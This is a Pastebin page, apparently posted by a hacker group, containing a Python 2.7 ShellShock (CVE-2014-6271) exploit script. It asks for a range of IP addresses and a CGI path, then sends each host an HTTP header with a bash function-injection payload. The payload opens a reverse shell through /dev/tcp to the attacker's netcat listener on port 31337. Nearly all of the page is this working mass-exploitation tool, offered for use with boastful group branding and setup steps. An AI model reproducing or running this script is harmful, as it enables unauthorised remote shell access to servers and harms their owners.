Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- We are...
- _____ _________
- / _ \ ____ ____ ____ / _____/ ____ ____
- / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
- / | \ | ( <_> ) | \/ \ ___/\ \___
- \____|__ /___| /\____/|___| /_______ /\___ >\___ >
- \/ \/ \/ \/ \/ \/
- //Laughing at your security since 2012*
- =================================================================================================
- Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - 4prili666h05t - Hannaichi - ap3x h4x0r
- - Gh05tFr3ak - xCyb3r 3vil7 - Hassouna Khalil - spider64
- =================================================================================================
- # \!/ Enter your No-Ip address or other listening address in line 57 \!/
- # \!/ Launch nc -l 31337 before executing script! \!/
- # Dont forgets to update bash so you donts get PWNed while "testing"... lol
- # yum -y update bash; apt-get -y update bash; reboot
- # (Script is coded in python2.7, errors running with python3.0)
- import httplib,urllib
- print "###########################################################"
- print "### ShellShock.py ###"
- print "### Bash 0-day Environment Variable Injector ###"
- print "### CVE-2014-6271 ###"
- print "### *************************************************** ###"
- print "### ###"
- print "### It's either shell or be shelled ###"
- print "### ###"
- print "### _.-''|''-._ ###"
- print "### .-' | `-. ###"
- print "### .'\ | /`. ###"
- print "### .' \ | / `. ###"
- print "### \ \ | / / ###"
- print "### `\ \ | / /' ###"
- print "### `\ \ | / /' ###"
- print "### `\ \ | / /' ###"
- print "### _.-`\ \ | / /'-._ ###"
- print "### {_____`\\|//'______} ###"
- print "### `-' ###"
- print "### ###"
- print "### twitter.com/_d3f4ult ###"
- print "###########################################################"
- print "\n"
- print '\t\!/ Reverse shell returned on port 31337 \!/\n'
- print '\t Enter The First Three IP ranges To Scan \n'
- url = raw_input(" [Example : 123.456.789] : ")
- finput = input("Enter the Starting IP of Range to Scan : ")
- sinput = input("Enter the Ending IP of Range to Scan for : ")
- print
- path = raw_input("Enter Vuln CGI Path : ")
- for x in range(finput,sinput + 1):
- murl = url + "." + str(x)
- conn = httplib.HTTPConnection(murl)
- reverse_shell='() { :; }; /bin/bash -i >& /dev/tcp/NO-IP/31337 0>&1'
- headers = {"Content-type": "application/x-www-form-urlencoded",
- "test": reverse_shell}
- conn.request("GET",path,headers=headers)
- res = conn.getresponse()
- if str(res.status) == '200':
- print "[+] Website Present and Payload Successfully Sent To " + murl + path
- data = res.read()
- print data
- else:
- print "[!]" + murl + path + " Is Not Vulnerable."
Add Comment
Please, Sign In to add comment